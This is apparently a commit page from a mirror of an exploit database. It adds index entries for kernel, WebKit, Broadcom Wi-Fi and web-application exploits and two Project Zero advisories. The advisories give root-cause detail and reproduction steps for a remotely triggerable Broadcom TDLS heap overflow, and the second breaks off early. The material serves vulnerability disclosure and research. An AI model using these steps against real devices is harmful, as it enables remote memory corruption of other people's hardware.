bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-04-05

Browse source 
31 new exploits

macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow

macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption

macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability
macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn
macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking
macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption
macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free

macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking
Broadcom Wi-Fi SoC - Heap Overflow in _wlc_tdls_cal_mic_chk_ Due to Large RSN IE in TDLS Setup Confirm Frame
Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free
Apple WebKit - 'RenderLayer' Use-After-Free
Apple WebKit - Negative-Size memmove in HTMLFormElement
Apple WebKit - 'FormSubmission::create' Use-After-Free
Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free
Apple WebKit - 'table' Use-After-Free
Apple WebKit - 'WebCore::toJS' Use-After-Free

macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device

Bluecoat ASG 6.6/CAS 1.3 - Privilege Escalation (Metasploit)

Bluecoat ASG 6.6/CAS 1.3 - OS Command Injection (Metasploit)

Broadcom Wi-Fi SoC - TDLS Teardown Request Remote Heap Overflow Exploit

SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)

Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)

Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow

Pixie 1.0.4 - Arbitrary File Upload
Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window
Apple WebKit 10.0.2(12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting
Apple WebKit 10.0.2(12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion
Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting
Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting
Maian Uploader 4.0 - 'index.php' keywords Parameter Cross-Site Scripting
Maian Uploader 4.0 - admin/index.php keywords Parameter Cross-Site Scripting
Maian Uploader 4.0 - admin/inc/header.php Multiple Parameter Cross-Site Scripting
Maian Uploader 4.0 - 'keywords' Parameter Cross-Site Scripting
Maian Uploader 4.0 - 'index.php' Cross-Site Scripting
Maian Uploader 4.0 - 'header.php' Cross-Site Scripting
Maian Uploader 4.0 - 'user' Parameter SQL Injection
Maian Survey 1.1 - 'survey' Parameter SQL Injection
Maian Greetings 2.1 - 'cat' Parameter SQL Injection
This commit is contained in:
Offensive Security 2017-04-05 05:01:18 +00:00
parent 8ce122cbaf
commit 6624e39c26
32 changed files with 3887 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

39
files.csv
View file

@ -203,6 +203,7 @@ id,file,description,date,author,platform,type,port
1129,platforms/windows/dos/1129.c,"Quick 'n EasY 3.0 FTP Server - Remote Denial of Service",2005-08-02,Kozan,windows,dos,0
1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of Service",2005-08-05,basher13,windows,dos,0
1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos,0
41796,platforms/multiple/dos/41796.c,"macOS/iOS Kernel 10.12.3 (16D32) - 'bpf' Heap Overflow",2017-04-04,"Google Security Research",multiple,dos,0
1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone - Denial of Service",2005-08-12,"Pierre Kroma",hardware,dos,0
1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 - Denial of Service",2005-08-17,"Luigi Auriemma",windows,dos,0
1157,platforms/cgi/dos/1157.pl,"GTChat 0.95 Alpha - Remote Denial of Service",2005-08-18,RusH,cgi,dos,0
@ -1909,7 +1910,9 @@ id,file,description,date,author,platform,type,port
16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0
16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve (Metasploit)",2010-08-07,Metasploit,unix,dos,0
16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow Exploit (MS05-039) (Metasploit)",2010-08-30,Metasploit,windows,dos,0
41793,platforms/multiple/dos/41793.c,"macOS/iOS Kernel 10.12.3 (16D32) - SIOCGIFORDER Socket ioctl Off-by-One Memory Corruption",2017-04-04,"Google Security Research",multiple,dos,0
16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow (Metasploit)",2010-09-25,Metasploit,aix,dos,0
41798,platforms/macos/dos/41798.c,"macOS Kernel 10.12.2 (16C67) - Memory Disclosure Due to Lack of Bounds Checking in AppleIntelCapriController::getDisplayPipeCapability",2017-04-04,"Google Security Research",macos,dos,0
16790,platforms/windows/dos/16790.rb,"PSOProxy 0.91 - Stack Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,dos,8080
16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,aix,dos,0
16939,platforms/multiple/dos/16939.txt,"Hiawatha WebServer 7.4 - Denial of Service",2011-03-07,"Rodrigo Escobar",multiple,dos,0
@ -5430,8 +5433,13 @@ id,file,description,date,author,platform,type,port
41668,platforms/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
41669,platforms/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
41670,platforms/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos,0
41791,platforms/macos/dos/41791.c,"macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn",2017-04-04,"Google Security Research",macos,dos,0
41792,platforms/multiple/dos/41792.c,"macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",multiple,dos,0
41797,platforms/macos/dos/41797.c,"macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",macos,dos,0
41794,platforms/multiple/dos/41794.c,"macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0
41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0
41790,platforms/macos/dos/41790.c,"macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0
41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0
41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0
41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0
@ -5444,6 +5452,14 @@ id,file,description,date,author,platform,type,port
41767,platforms/linux/dos/41767.txt,"Linux Kernel (Ubuntu 11.10/12.04) - binfmt_script Stack Data Disclosure",2014-01-14,halfdog,linux,dos,0
41768,platforms/linux/dos/41768.txt,"Apache 2.2 - Scoreboard Invalid Free On Shutdown",2012-01-11,halfdog,linux,dos,0
41769,platforms/linux/dos/41769.txt,"Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow",2011-11-02,halfdog,linux,dos,0
41806,platforms/hardware/dos/41806.txt,"Broadcom Wi-Fi SoC - Heap Overflow in _wlc_tdls_cal_mic_chk_ Due to Large RSN IE in TDLS Setup Confirm Frame",2017-04-04,"Google Security Research",hardware,dos,0
41807,platforms/multiple/dos/41807.html,"Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
41809,platforms/multiple/dos/41809.html,"Apple WebKit - 'RenderLayer' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
41810,platforms/multiple/dos/41810.html,"Apple WebKit - Negative-Size memmove in HTMLFormElement",2017-04-04,"Google Security Research",multiple,dos,0
41811,platforms/multiple/dos/41811.html,"Apple WebKit - 'FormSubmission::create' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
41812,platforms/multiple/dos/41812.html,"Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
41813,platforms/multiple/dos/41813.html,"Apple WebKit - 'table' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
41814,platforms/multiple/dos/41814.html,"Apple WebKit - 'WebCore::toJS' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -6789,6 +6805,7 @@ id,file,description,date,author,platform,type,port
16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0
16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0
41804,platforms/multiple/local/41804.c,"macOS/iOS Kernel 10.12.3 (16D32) - Double-Free Due to Bad Locking in fsevents Device",2017-04-04,"Google Security Research",multiple,local,0
40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
16503,platforms/windows/local/16503.rb,"Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0
@ -6798,6 +6815,7 @@ id,file,description,date,author,platform,type,port
16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,local,0
16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 - _Marshaled_pUnk Code Execution (Metasploit)",2011-01-08,Metasploit,windows,local,0
16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption (Metasploit) (1)",2010-06-15,Metasploit,windows,local,0
41786,platforms/linux/local/41786.rb,"Bluecoat ASG 6.6/CAS 1.3 - Privilege Escalation (Metasploit)",2017-04-03,"Chris Hebert",linux,local,0
16606,platforms/windows/local/16606.rb,"Adobe - 'Collab.getIcon()' Buffer Overflow (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (Metasploit) (1)",2010-09-20,Metasploit,windows,local,0
16615,platforms/windows/local/16615.rb,"Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)",2010-04-30,Metasploit,windows,local,0
@ -10625,6 +10643,7 @@ id,file,description,date,author,platform,type,port
16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0
16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote,0
16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0
41785,platforms/linux/remote/41785.rb,"Bluecoat ASG 6.6/CAS 1.3 - OS Command Injection (Metasploit)",2017-04-03,"Chris Hebert",linux,remote,0
16289,platforms/linux/remote/16289.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Metasploit)",2010-02-11,Metasploit,linux,remote,0
16291,platforms/multiple/remote/16291.rb,"HP OpenView OmniBack II - Command Execution (Metasploit)",2010-09-20,Metasploit,multiple,remote,0
16292,platforms/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,multiple,remote,0
@ -14396,6 +14415,7 @@ id,file,description,date,author,platform,type,port
33379,platforms/multiple/remote/33379.txt,"Apache Tomcat 3.2 - 404 Error Page Cross-Site Scripting",2009-09-02,MustLive,multiple,remote,0
33388,platforms/linux/remote/33388.f,"Xfig and Transfig 3.2.5 - '.fig' Buffer Overflow",2009-12-03,pedamachephepto,linux,remote,0
33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i - Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0
41805,platforms/hardware/remote/41805.txt,"Broadcom Wi-Fi SoC - TDLS Teardown Request Remote Heap Overflow Exploit",2017-04-04,"Google Security Research",hardware,remote,0
33453,platforms/windows/remote/33453.py,"Easy File Management Web Server 5.3 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0
33454,platforms/windows/remote/33454.py,"Easy Address Book Web Server 1.6 - Stack Buffer Overflow",2014-05-21,superkojiman,windows,remote,0
33471,platforms/hardware/remote/33471.txt,"D-Link DKVM-IP8 - 'auth.asp' Cross-Site Scripting",2010-01-06,POPCORN,hardware,remote,0
@ -15393,14 +15413,16 @@ id,file,description,date,author,platform,type,port
41690,platforms/multiple/remote/41690.rb,"Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit)",2014-03-06,Metasploit,multiple,remote,0
41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0
41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0
41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",python,remote,0
41738,platforms/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0
41775,platforms/windows/remote/41775.py,"Sync Breeze Enterprise 9.5.16 - 'GET' Buffer Overflow (SEH)",2017-03-29,"Daniel Teixeira",windows,remote,0
41808,platforms/hardware/remote/41808.txt,"Broadcom Wi-Fi SoC - 'dhd_handle_swc_evt' Heap Overflow",2017-04-04,"Google Security Research",hardware,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -24738,7 +24760,13 @@ id,file,description,date,author,platform,type,port
16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,php,webapps,0
16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0
16281,platforms/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps,0
41784,platforms/php/webapps/41784.txt,"Pixie 1.0.4 - Arbitrary File Upload",2017-04-02,rungga_reksya,php,webapps,0
16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0
41801,platforms/multiple/webapps/41801.html,"Apple Webkit - Universal Cross-Site Scripting by Accessing a Named Property from an Unloaded Window",2017-04-04,"Google Security Research",multiple,webapps,0
41802,platforms/multiple/webapps/41802.html,"Apple WebKit 10.0.2(12602.3.12.0.1) - 'disconnectSubframes' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0
41803,platforms/multiple/webapps/41803.html,"Apple WebKit 10.0.2(12602.3.12.0.1_ r210800) - 'constructJSReadableStreamDefaultReader' Type Confusion",2017-04-04,"Google Security Research",multiple,webapps,0
41799,platforms/multiple/webapps/41799.html,"Apple WebKit 10.0.2(12602.3.12.0.1) - 'Frame::setDocument (1)' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0
41800,platforms/multiple/webapps/41800.html,"Apple Webkit - 'JSCallbackData' Universal Cross-Site Scripting",2017-04-04,"Google Security Research",multiple,webapps,0
16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,cfm,webapps,0
16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTPd Daemon/Service - Arbitrary Command Execution (Metasploit)",2010-07-07,Metasploit,cgi,webapps,0
16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise - masterCGI Arbitrary Command Execution (Metasploit)",2010-10-05,Metasploit,cgi,webapps,0
@ -32157,9 +32185,9 @@ id,file,description,date,author,platform,type,port
31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0
31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injection",2008-05-05,ZoRLu,php,webapps,0
31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 - 'index.php' keywords Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
31742,platforms/php/webapps/31742.txt,"Maian Uploader 4.0 - admin/index.php keywords Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
31743,platforms/php/webapps/31743.txt,"Maian Uploader 4.0 - admin/inc/header.php Multiple Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
31741,platforms/php/webapps/31741.txt,"Maian Uploader 4.0 - 'keywords' Parameter Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
31742,platforms/php/webapps/31742.txt,"Maian Uploader 4.0 - 'index.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
31743,platforms/php/webapps/31743.txt,"Maian Uploader 4.0 - 'header.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0
31744,platforms/php/webapps/31744.txt,"osCommerce 2.1/2.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-05,"David Sopas Ferreira",php,webapps,0
31745,platforms/php/webapps/31745.txt,"BatmanPorTaL - uyeadmin.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0
31746,platforms/php/webapps/31746.txt,"BatmanPorTaL - profil.asp id Parameter SQL Injection",2008-05-05,U238,php,webapps,0
@ -37626,6 +37654,9 @@ id,file,description,date,author,platform,type,port
41674,platforms/php/webapps/41674.txt,"Flippa Clone - SQL Injection",2017-03-23,"Ihsan Sencan",php,webapps,0
41676,platforms/linux/webapps/41676.rb,"Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit)",2014-10-15,Metasploit,linux,webapps,0
41677,platforms/linux/webapps/41677.rb,"D-Link/TRENDnet - NCC Service Command Injection (Metasploit)",2015-02-26,Metasploit,linux,webapps,0
41787,platforms/php/webapps/41787.txt,"Maian Uploader 4.0 - 'user' Parameter SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0
41788,platforms/php/webapps/41788.txt,"Maian Survey 1.1 - 'survey' Parameter SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0
41789,platforms/php/webapps/41789.txt,"Maian Greetings 2.1 - 'cat' Parameter SQL Injection",2017-04-04,"Ihsan Sencan",php,webapps,0
41685,platforms/multiple/webapps/41685.rb,"MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit)",2014-11-18,Metasploit,multiple,webapps,0
41686,platforms/multiple/webapps/41686.rb,"OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'license.php' Remote Command Execution (Metasploit)",2015-01-25,Metasploit,multiple,webapps,0
41687,platforms/multiple/webapps/41687.rb,"OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'welcome' Remote Command Execution (Metasploit)",2015-01-05,Metasploit,multiple,webapps,0

Can't render this file because it is too large.

75
platforms/hardware/dos/41806.txt Executable file
View file

@ -0,0 +1,75 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1047
Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS.
One of the events handled by the BCM firmware is the processing of TDLS connections (802.11z). TDLS connections allow clients to exchange data between one another without passing it through the AP (thus preventing congestion at the AP).
In order to verify the integrity of TDLS messages, each message exchanged between the TDLS peers includes a message integrity code (MIC). The MIC is calculated using AES-CMAC with a key derived during the setup process (TPK-KCK).
When a TDLS Setup Request frame is sent by either one of the peers in an established TDLS connection, the receiving client must verify the MIC before processing the request. The MIC for TDLS Setup Request and TDLS Setup Confirm frames is calculated as follows:
AES-CMAC(TPK-KCK, InitiatorMAC ||
ResponderMAC ||
TransactionSeq ||
LinkID-IE ||
RSN-IE ||
TimeoutInterval-IE ||
FastTransition-IE)
(see "wpa_tdls_ftie_mic" under https://w1.fi/cgit/hostap/plain/src/rsn_supp/tdls.c)
All TDLS connections are accepted automatically from any peer and are handled solely by the BCM firmware (meaning there is no need for user interaction or involvement in any way - once a TDLS Setup Request is received by the firmware, it will proceed with the TDLS handshake and subsequently create a TDLS connection with the requesting peer).
When the BCM firmware receives a TDLS Setup request frame, it verifies the MIC and responds with a TDLS Setup Response frame. The initiator then sends a TDLS Setup confirm frame in order to establish the connection. The BCM firmware uses the "wlc_tdls_cal_mic_chk" function to calculate the MIC of the received frames (both for the setup and the confirm). When processing the TDLS Setup Request frame, the RSN IE is verified and parsed in order to proceed with the derivation of the TPK. This verification also makes sure that the length of the RSN IE is valid for the chosen encryption type. However, when a TDLS Setup Confirm (M3) message is received, the firmware fails to verify the RSN IE, before calling the "wlc_tdls_cal_mic_chk" function in order to verify the MIC of the incoming frame.
The "wlc_tdls_cal_mic_chk" function allocates a buffer of size 256 on the heap, into which the needed information elements are gathered in order to calculate the AES-CMAC. However, the function does not sufficiently verify the length of the RSN IE included in the Setup Confirm frame. This allows an attacker to include an abnormally large RSN IE, causing a heap-overflow in "wlc_tdls_cal_mic_chk".
Here is the approximate simplified high-level code for the function:
1. uint8_t* buffer = malloc(256);
2. uint8_t* pos = buffer;
3.
4. //Copying the initial (static) information
5. uint8_t* linkid_ie = bcm_parse_tlvs(..., 101);
6. memcpy(pos, linkid_ie + 0x8, 0x6); pos += 0x6; //Initiator MAC
7. memcpy(pos, linkid_ie + 0xE, 0x6); pos += 0x6; //Responder MAC
8. *pos = transaction_seq; pos++; //TransactionSeq
9. memcpy(pos, linkid_ie, 0x14); pos += 0x14; //LinkID-IE
10.
11. //Copying the RSN IE
12. uint8_t* rsn_ie = bcm_parse_tlvs(..., 48);
13. if (rsn_ie[1] + 2 + (pos - buffer) > 0xFF) {
14. ... //Handle overflow
15. }
16. memcpy(pos, rsn_ie, rsn_ie[1] + 2); pos += rsn_ie[1] + 2; //RSN-IE
17.
18. //Copying the remaining IEs
19. uint8_t* timeout_ie = bcm_parse_tlvs(..., 56);
20. uint8_t* ft_ie = bcm_parse_tlvs(..., 55);
21. memcpy(pos, timeout_ie, 0x7); pos += 0x7; //Timeout Interval IE
22. memcpy(pos, ft_ie, 0x54); pos += 0x54; //Fast-Transition IE
As can be seen above, although the function verifies that the RSN IE's length does not exceed the allocated buffer (line 13), it fails to verify that the subsequent IEs also do not overflow the buffer. As such, setting the RSN IE's length to a large value (i.e., such that rsn_ie[1] + 2 + (pos - buffer) == 0xFF) will cause the Timeout Interval and Fast Transition IEs to be copied out-of-bounds, overflowing the buffer.
It should be noted that prior to calculating the MIC, the function in charge of processing the TDLS Setup Confirm frame calls a helper function in order to verify the nonce values in the FTIE (to make sure they match the nonces in the TDLS Setup Request and TDLS Setup Response frames, M1 & M2). However, since the attacker is the initiator of the TDLS connection, they may choose the value of Snonce (bytes [52-84) of the FTIE) arbitrarily. This leaves only the Anonce (bytes [20-52) of the FTIE) as uncontrolled bytes during the overflow, since they are chosen by the responder.
It should also be noted that the heap implementation used in the BCM firmware does not perform safe unlinking or include heap header cookies, allowing heap overflows such as the one described above to be exploited more reliably.
I'm attaching a patch to wpa_supplicant 2.6 which modifies the TDLS Setup Confirm frame sent by the supplicant in order to trigger the heap overflow. You can reproduce the issue by following these steps:
1. Download wpa_supplicant 2.6 from https://w1.fi/releases/wpa_supplicant-2.6.tar.gz
2. Apply the included patch file
3. Build wpa_supplicant (with TDLS support)
4. Use wpa_supplicant to connect to a network
5. Connect to wpa_cli:
5.1. Setup a TDLS connection to the BCM peer using "TDLS_SETUP <MAC_ADDRESS_OF_PEER>"
(Where MAC_ADDRESS_OF_PEER is the MAC address of a peer with a BCM SoC which is associated to the same network).
At this point the heap overflow will be triggered. The code in the patch will corrupt the heap, causing the remote BCM SoC to reset after a while.
I've been able to verify this vulnerability on the BCM4339 chip, running version 6.37.34.40 (as present on the Nexus 5). However, I believe this vulnerability's scope includes a wider range of Broadcom SoCs and versions.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41806.zip

133
platforms/hardware/remote/41805.txt Executable file
View file

@ -0,0 +1,133 @@
Source:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1046
https://googleprojectzero.blogspot.ca/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html
Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile devices and Wi-Fi routers, and are capable of handling many Wi-Fi related events without delegating to the host OS.
One of the events handled by the BCM firmware is the processing of TDLS connections (802.11z). TDLS connections allow clients to exchange data between one another without passing it through the AP (thus preventing congestion at the AP).
In order to verify the integrity of TDLS messages, each message exchanged between the TDLS peers includes a message integrity code (MIC). The MIC is calculated using AES-CMAC with a key derived during the setup process (TPK-KCK).
When a TDLS Teardown Request frame is sent by either one of the peers in an established TDLS connection, the receiving client must verify the MIC before processing the request. The MIC for TDLS teardown requests is calculated as follows:
AES-CMAC(TPK-KCK, LinkID-IE || ReasonCode || DialogToken || TransactionSeq || FastTransition-IE)
(see "wpa_tdls_key_mic_teardown" under https://w1.fi/cgit/hostap/plain/src/rsn_supp/tdls.c)
It should be noted that all TDLS connections are accepted automatically from any peer and are handled solely by the BCM firmware (meaning there is no need for user interaction or involvement in any way - once a TDLS Setup Request is received by the firmware, it will proceed with the TDLS handshake and subsequently create a TDLS connection with the requesting peer).
